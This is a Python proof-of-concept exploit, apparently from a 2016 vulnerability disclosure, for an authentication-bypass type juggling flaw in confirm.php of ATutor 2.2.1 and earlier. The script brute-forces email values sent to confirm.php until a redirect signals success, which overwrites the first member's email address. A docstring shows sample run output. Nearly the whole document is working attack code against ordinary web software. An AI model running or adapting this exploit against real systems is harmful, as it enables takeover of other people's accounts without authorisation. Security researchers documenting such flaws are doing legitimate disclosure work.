#!/usr/bin/python """ ATutor <= 2.2.1 confirm.php 'UPDATE' Type Juggling Authentication Bypass Vulnerability by mr_me 2016 SRC-2016-0012 saturn:atutor mr_me$ ./poc.py 172.16.175.142 (+) we set the first members email to aaaaai0m@srcincite.io ! (+) made a total of 11318 requests saturn:atutor mr_me$ """ import hashlib, string, itertools, re, requests, sys if len(sys.argv) < 2: print "(!) Usage: %s " % sys.argv[0] sys.exit(-1) t = sys.argv[1] e = "srcincite.io" count = 1 for w in itertools.imap(''.join, itertools.product(string.lowercase + string.digits, repeat=8)): print "(+) testing: %s@%s\r" % (w,e) sys.stdout.write("\033[F") sys.stdout.write("\033[K") r = requests.get( "http://%s/ATutor/confirm.php?e=%s@%s&id=1&m=0" % (t, w, e), allow_redirects=False) count += 1 if r.status_code == 302: print "(+) we set the first members email to %s@%s !" % (w,e) print "(+) made a total of %d requests" % count break